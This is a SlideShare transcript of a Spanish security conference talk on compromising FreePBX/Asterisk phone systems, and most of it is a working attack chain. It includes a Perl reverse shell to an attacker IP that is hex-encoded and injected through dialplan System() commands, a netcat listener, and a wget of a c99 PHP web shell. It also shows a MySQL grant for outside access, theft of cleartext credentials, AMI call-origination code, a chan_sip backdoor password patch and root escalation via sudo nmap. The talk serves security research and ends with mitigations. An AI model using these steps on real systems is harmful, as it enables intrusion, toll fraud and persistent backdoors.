FreePBX for Fun & Profit
Jose Luis Verdeguer
@pepeluxx

verdeguer@zoonsuite.com
http://blog.pepelux.org
http://www.zoonsui...
Sobre mi ...
●

Ingeniero Técnico de Sistemas Informáticos por la Universidad de Alicante

●

Master en Desarrollo y Progr...
¿ FreePBX ? ¿ Asterisk ? ¿ VoIP ?
FreePBX es una distribución basada en Asterisk.
Asterisk es un software libre que realiz...
¿ FreePBX ? ¿ Asterisk ? ¿ VoIP ?
Frente a una centralita convencional, un sistema de VoIP:
Es más económico (gratis – sól...
Características:
- Fail2ban que bloquea ataques de fuerza bruta (SSH, HTTP, SIP).
- MySQL sin usuarios accesibles desde el...
Supongamos que tenemos acceso a un panel de control de una FreePBX.
Supongamos que tenemos acceso a un panel de control de una FreePBX.

¿ Es mucho suponer ?
Buscando servidores FreePBX con SIPvicious:

Última versión estable: 2.11.0 (Stable-4.211.64-7)

Fecha de la versión: 20/S...
Buscando servidores FreePBX con Shodan:
Como decía antes ...
Supongamos que tenemos acceso a un panel de control de una FreePBX.
Lo que haría cualquier persona con acceso a un panel de una FreePBX sería crear una
extensión para hacer llamadas gratis …...
Lo que haría cualquier persona con acceso a un panel de una FreePBX sería crear una
extensión para hacer llamadas gratis …...
Podemos ver la versión de Asterisk con 'core show version'.

O ver las llamadas activas con 'core show channels'.
Comando System de Asterisk.
Nuestro objetivo:

Ejecutar comandos del sistema a través de llamadas telefónicas.

Para ello:
Vamos a crear una extensión...
El problema es que FreePBX está limitado a la hora de definir lo que hace una extensión, ya
que se basa en lo permitido a ...
Usando el CLI (Interfaz de Comandos) intentaremos crear una nueva extensión que nos
permita interactuar con el sistema:
Usando el CLI (Interfaz de Comandos) intentaremos crear una nueva extensión que nos
permita interactuar con el sistema:

R...
Usando el CLI (Interfaz de Comandos) intentaremos crear una nueva extensión que nos
permita interactuar con el sistema:

R...
Usando el CLI (Interfaz de Comandos) intentaremos crear una nueva extensión que nos
permita interactuar con el sistema:

S...
Intentaremos inyectar una shell que se guarde en un fichero, usando el comando System
de Asterisk:

Trataremos de usar el ...
Las líneas a inyectar, a través del CLI, quedarían de la siguiente forma:

dialplan add extension 999,1,answer, into ext-l...
El problema es que a través de la web no podemos introducir ciertos caracteres, por lo que
hay que codificar la entrada:

...
Quedando finalmente:
dialplan add extension 999,1,answer, into ext-local
dialplan add extension 999,2,system,"echo -e 'x75...
Una vez realizada la inyección de la nueva extensión en el dialplan, como
tenemos acceso al panel, nos creamos una cuenta ...
Una vez realizada la inyección de la nueva extensión en el dialplan, como
tenemos acceso al panel, nos creamos una cuenta ...
Ahora creamos otro plan de llamadas para ejecutarlo:
- Recargamos el dialplan para borrar la extensión 999:

dialplan relo...
Dejamos una terminal a la escucha con Netcat en nuestro equipo:
pepelux@debian$ nc -l -p 31337

Llamamos por teléfono a la...
Automatizando el proceso (script 1)
Automatizando el proceso (script 1)
Pasos a seguir:

1 - Creamos un plan de llamadas para crear el script con la shell:
pe...
Automatizando el proceso (script 2)
Automatizando el proceso (script 2)
Pasos a seguir:

1 – Ponemos un terminal a la escucha con Netcat:
pepelux@debian$ nc -...
¡¡ Veamos un caso práctico !!

DEMO
Con la última versión de FreePBX: 2.11.0 (Stable-4.211.64-7)
del 20/09/2013
¿Quiénes somos y dónde estamos?
sh-4.1$ whoami

asterisk
sh-4.1$ id
uid=uid=498(asterisk) gid=498(asterisk) groups=498(ast...
Analicemos los servicios
Algunos comandos:
sh-4.1$ mysql -D mysql -u root -e "show databases"
sh-4.1$ mysql -D mysql -u root -e "show tables"

sh-4...
Algunos comandos:

¿ Veis algo extraño ?

sh-4.1$ mysql -D mysql -u root -e "show databases"
sh-4.1$ mysql -D mysql -u roo...
Algunos comandos:

¿ Veis algo extraño ?

sh-4.1$ mysql -D mysql -u root -e "show databases"
sh-4.1$ mysql -D mysql -u roo...
Podemos darnos acceso desde el exterior:
sh-4.1$ mysql -D mysql -u root -e "grant select,insert,drop on asterisk.* to
'pep...
¿Y si el administrador ha puesto una contraseña a la cuenta de root?
¿Y si el administrador ha puesto una contraseña a la cuenta de root?

En el fichero /etc/freepbx.conf (propiedad del usuar...
sh-4.1$ mysql -D asterisk -u freepbxuser -e "show tables" -p
Enter password:
Echemos un ojo a la web:
sh-4.1$ ls /var/www/html/admin -la
Echemos un ojo a la web:
sh-4.1$ ls /var/www/html/admin -la

¿ Veis algo extraño ?
Echemos un ojo a la web:
sh-4.1$ ls /var/www/html/admin -la

¿ Veis algo extraño ?

Soy el propietario de la web!!
¿Qué tal si subimos una shell?

sh-4.1$ cd /var/www/html
sh-4.1$ wget 192.168.2.9/freepbx/c99.txt

sh-4.1$ mv c99.txt c99....
¿Qué tal si subimos una shell?

sh-4.1$ cd /var/www/html
sh-4.1$ wget 192.168.2.9/freepbx/c99.txt

sh-4.1$ mv c99.txt c99....
Es posible que hayamos accedido al sistema a través de un bug y no conozcamos
la contraseña del administrador … si lo actu...
Es posible que hayamos accedido al sistema a través de un bug y no conozcamos
la contraseña del administrador … si lo actu...
¡¡¡ no hay problema !!!
… en /etc/amportal.conf (propiedad del usuario asterisk) está toda la
configuración de FreePBX.

s...
¡¡¡ no hay problema !!!
… en /etc/amportal.conf (propiedad del usuario asterisk) está toda la
configuración de FreePBX.

s...
Veamos los ficheros de configuración ...
sh-4.1$ ls -la /etc/asterisk
Veamos los ficheros de configuración ...
sh-4.1$ ls -la /etc/asterisk

¿ Veis algo extraño ?
Veamos los ficheros de configuración ...
sh-4.1$ ls -la /etc/asterisk

¿ Veis algo extraño ?

Soy el propietario de Asteri...
¿Qué tal si usamos el servicio Manager, que por defecto viene activo?
sh-4.1$ cat /etc/asterisk/manager.conf
[general]
ena...
Ya que tenemos el control de la web, nos creamos una página “atractiva” en
algún lugar oculto ...
Y la conectamos con el servicio Manager de la FreePBX ...
$sc = fsockopen(“localhost”, 5038, $errnum, $errdesc) or die(“Co...
Además, el servicio Manager NO está bloqueado ante accesos externos ...
pepelux@debian ~$ nmap 192.168.2.11 -p5038
Startin...
A ver los módulos ...
sh-4.1$ ls -la /usr/lib/asterisk/modules/
A ver los módulos ...
sh-4.1$ ls -la /usr/lib/asterisk/modules/

Bueno, al menos son propiedad de root!!!

parece que no l...
¿ O sí que podemos ?
¿ O sí que podemos ?
Porque si el fichero /etc/asterisk/asterisk.conf, donde se indica la ruta de los módulos, es
propieda...
¿ O sí que podemos ?
Porque si el fichero /etc/asterisk/asterisk.conf, donde se indica la ruta de los módulos, es
propieda...
Buscamos un directorio con permisos de escritura y copiamos los módulos:

sh-4.1$ mkdir /var/lib/asterisk/moh/modules

sh-...
Modificamos el fichero asterisk.conf cambiando la ruta de los módulos:
sh-4.1$ cd /etc/asterisk
sh-4.1$ mv asterisk.conf a...
Reiniciamos el Asterisk ...
sh-4.1$ asterisk -rx "core restart when convenient"
Reiniciamos el Asterisk ...
sh-4.1$ asterisk -rx "core restart when convenient"

Verificamos qué módulos hay en uso ...
sh...
Y digo yo …
Y digo yo … Si Asterisk es de código abierto y somos capaces de cambiar un
módulo en la FreePBX ...
Y digo yo … Si Asterisk es de código abierto y somos capaces de cambiar un
módulo en la FreePBX ...

¿Qué tal si modificam...
Función de chan_sip.c que valida el registro de los peers:
/*! brief Check user authorization from peer definition
Some ac...
Validación del peer:
if (!ast_strlen_zero(md5secret)) { ast_copy_string(a1_hash, md5secret, sizeof(a1_hash)); }
else {
cha...
Añadiendo estas pocas líneas permitiremos que cualquier usuario valide con la
contraseña 31337:
if (good_response == 0) {
...
Compilamos en nuestra máquina el módulo y lo subimos al servidor de FreePBX:
sh-4.1$ cd /var/lib/asterisk/moh/modules/
sh-...
Compilamos en nuestra máquina el módulo y lo subimos al servidor de FreePBX:
sh-4.1$ cd /var/lib/asterisk/moh/modules/
sh-...
Compilamos en nuestra máquina el módulo y lo subimos al servidor de FreePBX:
sh-4.1$ cd /var/lib/asterisk/moh/modules/
sh-...
Compilamos en nuestra máquina el módulo y lo subimos al servidor de FreePBX:
sh-4.1$ cd /var/lib/asterisk/moh/modules/
sh-...
Pero …
Pero …
Y si nos descargamos el chan_sip.so original a nuestra máquina ...
sh-4.1$ cp /usr/lib/asterisk/modules/chan_sip.so...
pepelux@debian$ strings chan_sip_cop.so

__gmon_start__
__cxa_finalize
_Jv_RegisterClasses
ast_str_append
….......
;*2$"
4...
pepelux@debian$ strings chan_sip_cop.so

__gmon_start__
__cxa_finalize
_Jv_RegisterClasses
ast_str_append
….......
;*2$"
4...
Repetimos el proceso …
sh-4.1$ cd /var/lib/asterisk/moh/modules/
sh-4.1$ rm chan_sip.so
sh-4.1$ wget http://192.168.2.9:/f...
Repetimos el proceso …
sh-4.1$ cd /var/lib/asterisk/moh/modules/
sh-4.1$ rm chan_sip.so
sh-4.1$ wget http://192.168.2.9:/f...
Repetimos el proceso …
sh-4.1$ cd /var/lib/asterisk/moh/modules/
sh-4.1$ rm chan_sip.so
sh-4.1$ wget http://192.168.2.9:/f...
Repetimos el proceso …
sh-4.1$ cd /var/lib/asterisk/moh/modules/
sh-4.1$ rm chan_sip.so
sh-4.1$ wget http://192.168.2.9:/f...
Repetimos el proceso …
sh-4.1$ cd /var/lib/asterisk/moh/modules/
sh-4.1$ rm chan_sip.so
sh-4.1$ wget http://192.168.2.9:/f...
¡¡ Veamos un caso práctico !!

DEMO
Con la última versión de FreePBX: 2.11.0 (Stable-4.211.64-7)
del 20/09/2013
El problema es que con todo esto, habremos dejado muchos logs ...
El problema es que con todo esto, habremos dejado muchos logs ...
No pasa nada, los logs también son propiedad del usuario...
El problema es que con todo esto, habremos dejado muchos logs ...
No pasa nada, los logs también son propiedad del usuario...
Además de todo esto, si la versión de FreePBX es <= 2.10.0 …
sh-4.1$ cat /etc/sudoers
asterisk ALL = NOPASSWD: /sbin/shutd...
¡ Podemos rootear la máquina !
sh-4.1$ sudo nmap --interactive
Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Wel...
Otros sistemas
La web es mucho más estricta y no podemos inyectar el script desde el CLI
Otros sistemas
La web es mucho más estricta y no podemos inyectar el script desde el CLI
Pero trae un editor de ficheros q...
Otros sistemas

Durante la instalación nos obliga a poner una contraseña al usuario root de mysql.
Otros sistemas

Durante la instalación nos obliga a poner una contraseña al usuario root de mysql.
Pero:
bash-3.2$ cat /et...
Otros sistemas
Una vez dentro, lo mismo que antes.
bash-3.2$ id
uid=100(asterisk) gid=101(asterisk)
La web es propiedad de...
Otros sistemas
En versiones de Elastix superiores a la 2.2.0 se ha corregido el “problema” del fichero sudoers
...
Otros sistemas
En versiones de Elastix superiores a la 2.2.0 se ha corregido el “problema” del fichero sudoers
… pero olvi...
Otros sistemas
La web no trae interfaz de comandos (CLI)
Otros sistemas
La web no trae interfaz de comandos (CLI)
Pero trae un editor de ficheros que nos permite modificar fichero...
Otros sistemas
Una vez dentro, lo mismo que antes.
bash-3.2$ id
uid=100(asterisk) gid=101(asterisk)
bash-3.2$ grep AMPDB /...
Otros sistemas
En Trixbox siguen estando nmap y yum permitidos en el fichero sudoers ….

bash-3.2$ cat /etc/sudoers
asteri...
Consecuencias
¿ Y qué pasa si alguien entra en el sistema y hace alguna llamada ?

No puede ser tan grave …
Consecuencias
¿ Y qué pasa si alguien entra en el sistema y hace alguna llamada ?

No puede ser tan grave … ¿ o sí ?
Consecuencias
Además, una vez accedida a la consola, mediante técnicas de “Man in The Middle” (MiTM)
podemos:
Monitorizar ...
Soluciones
Si vamos a usar este tipo de plataformas, debemos tomar unas ciertas medidas de seguridad:
- Restringir el acce...
¡ Gracias !
Jose Luis Verdeguer
@pepeluxx
verdeguer@zoonsuite.com
http://blog.pepelux.org
http://www.zoonsuite.es
http://w...
V2 d2013   jose l verdeguer - freepbx fun and profit
V2 d2013   jose l verdeguer - freepbx fun and profit
V2 d2013   jose l verdeguer - freepbx fun and profit
V2 d2013   jose l verdeguer - freepbx fun and profit
V2 d2013   jose l verdeguer - freepbx fun and profit
V2 d2013   jose l verdeguer - freepbx fun and profit
V2 d2013   jose l verdeguer - freepbx fun and profit
V2 d2013   jose l verdeguer - freepbx fun and profit
V2 d2013   jose l verdeguer - freepbx fun and profit
V2 d2013   jose l verdeguer - freepbx fun and profit
V2 d2013   jose l verdeguer - freepbx fun and profit
V2 d2013   jose l verdeguer - freepbx fun and profit
V2 d2013   jose l verdeguer - freepbx fun and profit
Upcoming SlideShare
Loading in …5
×

V2 d2013 jose l verdeguer - freepbx fun and profit

207 views

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
207
On SlideShare
0
From Embeds
0
Number of Embeds
48
Actions
Shares
0
Downloads
6
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

V2 d2013 jose l verdeguer - freepbx fun and profit

  1. 1. FreePBX for Fun & Profit Jose Luis Verdeguer @pepeluxx verdeguer@zoonsuite.com http://blog.pepelux.org http://www.zoonsuite.es http://www.linkedin.com/in/pepelux
  2. 2. Sobre mi ... ● Ingeniero Técnico de Sistemas Informáticos por la Universidad de Alicante ● Master en Desarrollo y Programación de Aplicaciones y Servicios Web ● Director de Sistemas en ZoonSuite, S.L. ● Ponente en congresos de seguridad: ● ● No Con Name – Barcelona ● GSICKMINDS – A Coruña ● Navaja Negra – Albacete ● ● RootedCon – Madrid ConectaCon – Jaén Autor del libro: Hacking y Seguridad VoIP
  3. 3. ¿ FreePBX ? ¿ Asterisk ? ¿ VoIP ? FreePBX es una distribución basada en Asterisk. Asterisk es un software libre que realiza funciones de centralita telefónica.
  4. 4. ¿ FreePBX ? ¿ Asterisk ? ¿ VoIP ? Frente a una centralita convencional, un sistema de VoIP: Es más económico (gratis – sólo requiere un equipo no muy potente). Es mucho más flexible (extensiones ilimitadas, plan de llamadas, etc). Podemos realizar el mantenimiento nosotros mismos. El único “problema” es que requiere unos mínimos conocimientos de seguridad … o puede salirnos muy caro.
  5. 5. Características: - Fail2ban que bloquea ataques de fuerza bruta (SSH, HTTP, SIP). - MySQL sin usuarios accesibles desde el exterior. - Obliga a usar contraseñas robustas para las cuentas de la centralita. - Administración por HTTP en claro – FAIL! - La sesión del panel nunca caduca – FAIL! Aparentemente robusto desde el exterior pero … … una vez dentro la seguridad es algo deficiente
  6. 6. Supongamos que tenemos acceso a un panel de control de una FreePBX.
  7. 7. Supongamos que tenemos acceso a un panel de control de una FreePBX. ¿ Es mucho suponer ?
  8. 8. Buscando servidores FreePBX con SIPvicious: Última versión estable: 2.11.0 (Stable-4.211.64-7) Fecha de la versión: 20/Septiembre/2013 ////////////////// Fecha escaneo: Febrero/2013 Máquinas vulnerables (<=2.10.0): 22/30 (73%) Web accesible desde Internet: 17/30 (56%)
  9. 9. Buscando servidores FreePBX con Shodan:
  10. 10. Como decía antes ... Supongamos que tenemos acceso a un panel de control de una FreePBX.
  11. 11. Lo que haría cualquier persona con acceso a un panel de una FreePBX sería crear una extensión para hacer llamadas gratis … hasta que le pillen.
  12. 12. Lo que haría cualquier persona con acceso a un panel de una FreePBX sería crear una extensión para hacer llamadas gratis … hasta que le pillen. También podemos ejecutar comandos de Asterisk desde el CLI … aunque no permite ejecutar comandos del sistema (como ocurre desde la consola, usando '!').
  13. 13. Podemos ver la versión de Asterisk con 'core show version'. O ver las llamadas activas con 'core show channels'.
  14. 14. Comando System de Asterisk.
  15. 15. Nuestro objetivo: Ejecutar comandos del sistema a través de llamadas telefónicas. Para ello: Vamos a crear una extensión nueva que, tras llamar, ejecute un System(). exten => XXX,1,Answer() exten => XXX,2,System('nuestro comando') exten => XXX,3,Hangup()
  16. 16. El problema es que FreePBX está limitado a la hora de definir lo que hace una extensión, ya que se basa en lo permitido a través de la web, gestionado con unos simples formularios.
  17. 17. Usando el CLI (Interfaz de Comandos) intentaremos crear una nueva extensión que nos permita interactuar con el sistema:
  18. 18. Usando el CLI (Interfaz de Comandos) intentaremos crear una nueva extensión que nos permita interactuar con el sistema: Recordemos:
  19. 19. Usando el CLI (Interfaz de Comandos) intentaremos crear una nueva extensión que nos permita interactuar con el sistema: Recordemos:
  20. 20. Usando el CLI (Interfaz de Comandos) intentaremos crear una nueva extensión que nos permita interactuar con el sistema: Sería algo así: Formato: dialplan add extension extensión, prioridad, comando, [dato] into contexto Ejemplo: dialplan add extension 999,1,Answer, into ext-local dialplan add extension 999,2,System,comando_del_sistema into ext-local dialplan add extension 999,3,Hangup, into ext-local
  21. 21. Intentaremos inyectar una shell que se guarde en un fichero, usando el comando System de Asterisk: Trataremos de usar el comando System para crear en el sistema el siguiente script en Perl y almacenarlo en algún lugar del servidor: use Socket; socket (S, PF_INET, SOCK_STREAM, getprotobyname("tcp")); if (connect (S, sockaddr_in(31337, inet_aton("192.168.2.9")))) { open (STDIN, ">&S"); open (STDOUT, ">&S"); open (STDERR, ">&S"); exec ("/bin/bash -i"); }
  22. 22. Las líneas a inyectar, a través del CLI, quedarían de la siguiente forma: dialplan add extension 999,1,answer, into ext-local dialplan add extension 999,2,system,"echo -e 'use Socket;' > /tmp/s.pl" into ext-local dialplan add extension 999,3,system,"echo -e 'socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));' >> /tmp/s.pl" into ext-local dialplan add extension 999,4,system,"echo -e 'if(connect(S,sockaddr_in(31337,' >> /tmp/s.pl" into ext-local dialplan add extension 999,5,system,"echo -e 'inet_aton("192.168.2.9")))){' >> /tmp/s.pl" into ext-local dialplan add extension 999,6,system,"echo -e 'open(STDIN,">&S");' >> /tmp/s.pl" into ext-local dialplan add extension 999,7,system,"echo -e 'open(STDOUT,">&S");' >> /tmp/s.pl" into ext-local dialplan add extension 999,8,system,"echo -e 'open(STDERR,">&S");' >> /tmp/s.pl" into ext-local dialplan add extension 999,9,system,"echo -e 'exec("/bin/bash -i");}' >> /tmp/s.pl" into ext-local dialplan add extension 999,10,hangup, into ext-local
  23. 23. El problema es que a través de la web no podemos introducir ciertos caracteres, por lo que hay que codificar la entrada: 75 73 65 20 53 6f 63 6b 65 74 3b 0d 0a 73 6f 63 6b 65 74 28 53 2c 50 46 5f 49 4e 45 54 2c 53 4f 43 4b 5f 53 54 52 45 41 4d 2c 67 65 74 70 72 6f 74 6f 62 79 6e 61 6d 65 28 22 74 63 70 22 29 29 3b 0d 0a 69 66 28 63 6f 6e 6e 65 63 74 28 53 2c 73 6f 63 6b 61 64 64 72 5f 69 6e 28 33 31 33 33 37 2c 69 6e 65 74 5f 61 74 6f 6e 28 22 31 39 32 2e 31 36 38 2e 32 2e 39 22 29 29 29 29 7b 0d 0a 6f 70 65 6e 28 53 54 44 49 4e 2c 22 3e 26 53 22 29 3b 0d 0a 6f 70 65 6e 28 53 54 44 4f 55 54 2c 22 3e 26 53 22 29 3b 0d 0a 6f 70 65 6e 28 53 54 44 45 52 52 2c 22 3e 26 53 22 29 3b 0d 0a 65 78 65 63 28 22 2f 62 69 6e 2f 62 61 73 68 20 2d 69 22 29 3b 7d 0d 0a
  24. 24. Quedando finalmente: dialplan add extension 999,1,answer, into ext-local dialplan add extension 999,2,system,"echo -e 'x75x73x65x20x53x6fx63x6bx65x74x3bx0dx0a' > /tmp/s.pl" into ext-local dialplan add extension 999,3,system,"echo -e 'x73x6fx63x6bx65x74x28x53x2cx50x46x5fx49x4ex45x54x2cx53x4fx43x4bx5fx53x54x52x4 5x41x4dx2cx67x65x74x70x72x6fx74x6fx62x79x6ex61x6dx65x28x22x74x63x70x22x29x29 x3bx0dx0a' >> /tmp/s.pl" into ext-local dialplan add extension 999,4,system,"echo -e 'x69x66x28x63x6fx6ex6ex65x63x74x28x53x2cx73x6fx63x6bx61x64x64x72x5fx69x6ex28x3 3x31x33x33x37x2c' >> /tmp/s.pl" into ext-local dialplan add extension 999,5,system,"echo -e 'x69x6ex65x74x5fx61x74x6fx6ex28x22x31x39x32x2ex31x36x38x2ex32x2ex39x22x29x29x 29x29x7bx0dx0a' >> /tmp/s.pl" into ext-local dialplan add extension 999,6,system,"echo -e 'x6fx70x65x6ex28x53x54x44x49x4ex2cx22x3ex26x53x22x29x3bx0dx0a' >> /tmp/s.pl" into ext-local dialplan add extension 999,7,system,"echo -e 'x6fx70x65x6ex28x53x54x44x4fx55x54x2cx22x3ex26x53x22x29x3bx0dx0a' >> /tmp/s.pl" into extlocal dialplan add extension 999,8,system,"echo -e 'x6fx70x65x6ex28x53x54x44x45x52x52x2cx22x3ex26x53x22x29x3bx0dx0a' >> /tmp/s.pl" into ext-local dialplan add extension 999,9,system,"echo -e 'x65x78x65x63x28x22x2fx62x69x6ex2fx73x68x20x2dx69x22x29x3bx7dx0dx0a' >> /tmp/s.pl" into ext-local dialplan add extension 999,10,hangup, into ext-local
  25. 25. Una vez realizada la inyección de la nueva extensión en el dialplan, como tenemos acceso al panel, nos creamos una cuenta para poder realizar llamadas. Configuramos un softphone con esa cuenta. Llamamos por teléfono a la extensión 999 para ejecutar el plan de llamadas y crear nuestro script.
  26. 26. Una vez realizada la inyección de la nueva extensión en el dialplan, como tenemos acceso al panel, nos creamos una cuenta para poder realizar llamadas. Configuramos un softphone con esa cuenta. Llamamos por teléfono a la extensión 999 para ejecutar el plan de llamadas y crear nuestro script. Tras la llamada, tendremos el script en el sistema (almacenado como /tmp/s.pl).
  27. 27. Ahora creamos otro plan de llamadas para ejecutarlo: - Recargamos el dialplan para borrar la extensión 999: dialplan reload - Volvemos a crear la extensión: dialplan add extension 999,1,Answer, into ext-local dialplan add extension 999,2,System,"perl /tmp/s.pl" into ext-local dialplan add extension 999,3,Hangup, into ext-local
  28. 28. Dejamos una terminal a la escucha con Netcat en nuestro equipo: pepelux@debian$ nc -l -p 31337 Llamamos por teléfono a la extensión 999 para ejecutar nuestro script.
  29. 29. Automatizando el proceso (script 1)
  30. 30. Automatizando el proceso (script 1) Pasos a seguir: 1 - Creamos un plan de llamadas para crear el script con la shell: pepelux@debian$ perl freepbx.pl -h 192.168.2.20 -u admin -p web01 -cs -ip 192.168.2.9 2 – Llamamos por teléfono para ejecutarlo. 3 - Creamos un plan de llamadas para ejecutar el script: pepelux@debian$ perl freepbx.pl -h 192.168.2.20 -u admin -p web01 -es 4 – Ponemos una terminal a la escucha con Netcat: pepelux@debian$ nc -l -p 31337 5 – Llamamos por teléfono para ejecutarlo.
  31. 31. Automatizando el proceso (script 2)
  32. 32. Automatizando el proceso (script 2) Pasos a seguir: 1 – Ponemos un terminal a la escucha con Netcat: pepelux@debian$ nc -l -p 31337 2 – Lanzamos el script: pepelux@debian$ perl freepbx.pl -h 192.168.2.20 -u admin -p web01 -auto -call -user 206 pass 123456asd
  33. 33. ¡¡ Veamos un caso práctico !! DEMO Con la última versión de FreePBX: 2.11.0 (Stable-4.211.64-7) del 20/09/2013
  34. 34. ¿Quiénes somos y dónde estamos? sh-4.1$ whoami asterisk sh-4.1$ id uid=uid=498(asterisk) gid=498(asterisk) groups=498(asterisk) sh-4.1$ uname -a; cat /etc/issue /proc/version Linux localhost.localdomain 2.6.32-358.14.1.el6.i686 #1 SMP Tue Jul 16 21:12:30 UTC 2013 i686 i686 i386 GNU/Linux CentOS release 6.4 (Final) Kernel r on an m Linux version 2.6.32-358.14.1.el6.i686 (mockbuild@c6b10.bsys.dev.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-3) (GCC) ) #1 SMP Tue Jul 16 21:12:30 UTC 2013
  35. 35. Analicemos los servicios
  36. 36. Algunos comandos: sh-4.1$ mysql -D mysql -u root -e "show databases" sh-4.1$ mysql -D mysql -u root -e "show tables" sh-4.1$ mysql -D mysql -u root -e "select Host,User,Password from user"
  37. 37. Algunos comandos: ¿ Veis algo extraño ? sh-4.1$ mysql -D mysql -u root -e "show databases" sh-4.1$ mysql -D mysql -u root -e "show tables" sh-4.1$ mysql -D mysql -u root -e "select Host,User,Password from user"
  38. 38. Algunos comandos: ¿ Veis algo extraño ? sh-4.1$ mysql -D mysql -u root -e "show databases" sh-4.1$ mysql -D mysql -u root -e "show tables" sh-4.1$ mysql -D mysql -u root -e "select Host,User,Password from user" El usuario root NO tiene contraseña!!
  39. 39. Podemos darnos acceso desde el exterior: sh-4.1$ mysql -D mysql -u root -e "grant select,insert,drop on asterisk.* to 'pepelux'@'192.168.2.9' identified by 'mipass123';" Y acceder desde nuestra máquina: pepelux@debian$ mysql -h 192.168.2.20 -u pepelux -p Enter password: Welcome to the MySQL monitor. Commands end with ; or g. Your MySQL connection id is 184 Server version: 5.1.61 Source distribution ….. Type 'help;' or 'h' for help. Type 'c' to clear the current input statement. mysql>
  40. 40. ¿Y si el administrador ha puesto una contraseña a la cuenta de root?
  41. 41. ¿Y si el administrador ha puesto una contraseña a la cuenta de root? En el fichero /etc/freepbx.conf (propiedad del usuario asterisk) tenemos la contraseña de freepbxuser, en claro! sh-4.1$ cat /etc/freepbx.conf <?php $amp_conf['AMPDBUSER'] = 'freepbxuser'; $amp_conf['AMPDBPASS'] = 'hm7n2Xtcrpa0'; $amp_conf['AMPDBHOST'] = 'localhost'; $amp_conf['AMPDBNAME'] = 'asterisk'; $amp_conf['AMPDBENGINE'] = 'mysql'; ...
  42. 42. sh-4.1$ mysql -D asterisk -u freepbxuser -e "show tables" -p Enter password:
  43. 43. Echemos un ojo a la web: sh-4.1$ ls /var/www/html/admin -la
  44. 44. Echemos un ojo a la web: sh-4.1$ ls /var/www/html/admin -la ¿ Veis algo extraño ?
  45. 45. Echemos un ojo a la web: sh-4.1$ ls /var/www/html/admin -la ¿ Veis algo extraño ? Soy el propietario de la web!!
  46. 46. ¿Qué tal si subimos una shell? sh-4.1$ cd /var/www/html sh-4.1$ wget 192.168.2.9/freepbx/c99.txt sh-4.1$ mv c99.txt c99.php
  47. 47. ¿Qué tal si subimos una shell? sh-4.1$ cd /var/www/html sh-4.1$ wget 192.168.2.9/freepbx/c99.txt sh-4.1$ mv c99.txt c99.php
  48. 48. Es posible que hayamos accedido al sistema a través de un bug y no conozcamos la contraseña del administrador … si lo actualizan, perderemos el acceso …
  49. 49. Es posible que hayamos accedido al sistema a través de un bug y no conozcamos la contraseña del administrador … si lo actualizan, perderemos el acceso … Además, la contraseña en la BBDD no está en claro ... sh-4.1$ mysql -u root -D asterisk -e "select username, password_sha1 from ampusers"
  50. 50. ¡¡¡ no hay problema !!! … en /etc/amportal.conf (propiedad del usuario asterisk) está toda la configuración de FreePBX. sh-4.1$ cat /etc/amportal.conf | grep PASS AMPMGRPASS=amp111 CDRDBPASS= ARI_ADMIN_PASSWORD=web01 AMPDBPASS=hm7n2Xtcrpa0
  51. 51. ¡¡¡ no hay problema !!! … en /etc/amportal.conf (propiedad del usuario asterisk) está toda la configuración de FreePBX. sh-4.1$ cat /etc/amportal.conf | grep PASS AMPMGRPASS=amp111 CDRDBPASS= ARI_ADMIN_PASSWORD=web01 AMPDBPASS=hm7n2Xtcrpa0 ← Contraseña en claro del administrador
  52. 52. Veamos los ficheros de configuración ... sh-4.1$ ls -la /etc/asterisk
  53. 53. Veamos los ficheros de configuración ... sh-4.1$ ls -la /etc/asterisk ¿ Veis algo extraño ?
  54. 54. Veamos los ficheros de configuración ... sh-4.1$ ls -la /etc/asterisk ¿ Veis algo extraño ? Soy el propietario de Asterisk!!
  55. 55. ¿Qué tal si usamos el servicio Manager, que por defecto viene activo? sh-4.1$ cat /etc/asterisk/manager.conf [general] enabled = yes port = 5038 bindaddr = 0.0.0.0 displayconnects=no ;only effects 1.6+ [admin] secret = amp111 deny=0.0.0.0/0.0.0.0 permit=127.0.0.1/255.255.255.0 read = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate write = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
  56. 56. Ya que tenemos el control de la web, nos creamos una página “atractiva” en algún lugar oculto ...
  57. 57. Y la conectamos con el servicio Manager de la FreePBX ... $sc = fsockopen(“localhost”, 5038, $errnum, $errdesc) or die(“Connection failed”); fputs($sc, “Action: loginrn”); fputs($sc, “Events: offrn”); fputs($sc, “Username: adminrn”); fputs($sc, “Secret: amp111rnrn”); fputs($sc, “Action: originatern”); fputs($sc, “Channel: LOCAL/$MI_TELEFONO@ext-localrn”); fputs($sc, “WaitTime: 30rn”); fputs($sc, “Exten: $TFNO_DE_MI_AMIGOrn”); fputs($sc, “Context: ext-localrn”); fputs($sc, “Priority: 1rnrn”); fputs($sc, “Action: logoffrnrn”); sleep(3); fclose($sc);
  58. 58. Además, el servicio Manager NO está bloqueado ante accesos externos ... pepelux@debian ~$ nmap 192.168.2.11 -p5038 Starting Nmap 5.21 ( http://nmap.org ) at 2013-01-22 18:21 CET Nmap scan report for 192.168.2.11 Host is up (0.000054s latency). PORT STATE SERVICE 5038/tcp open unknown Si modificamos manager.conf permitiendo el acceso desde cualquier lugar ... permit=0.0.0.0/0.0.0.0 Podremos ejecutar comandos de Asterisk remotamente … pepelux@debian:~$ exec 3<>/dev/tcp/localhost/5038 && echo -e "Action: LoginnUsername:adminnSecret:amp111nEvents: offnnAction: CommandnCommand: sip show peersnnAction: Logoffnn" >&3 && cat <&3
  59. 59. A ver los módulos ... sh-4.1$ ls -la /usr/lib/asterisk/modules/
  60. 60. A ver los módulos ... sh-4.1$ ls -la /usr/lib/asterisk/modules/ Bueno, al menos son propiedad de root!!! parece que no los podemos modificar ...
  61. 61. ¿ O sí que podemos ?
  62. 62. ¿ O sí que podemos ? Porque si el fichero /etc/asterisk/asterisk.conf, donde se indica la ruta de los módulos, es propiedad del usuario asterisk …
  63. 63. ¿ O sí que podemos ? Porque si el fichero /etc/asterisk/asterisk.conf, donde se indica la ruta de los módulos, es propiedad del usuario asterisk … ¿ Qué nos impide copiar los módulos en otra ruta y modificar asterisk.conf ?
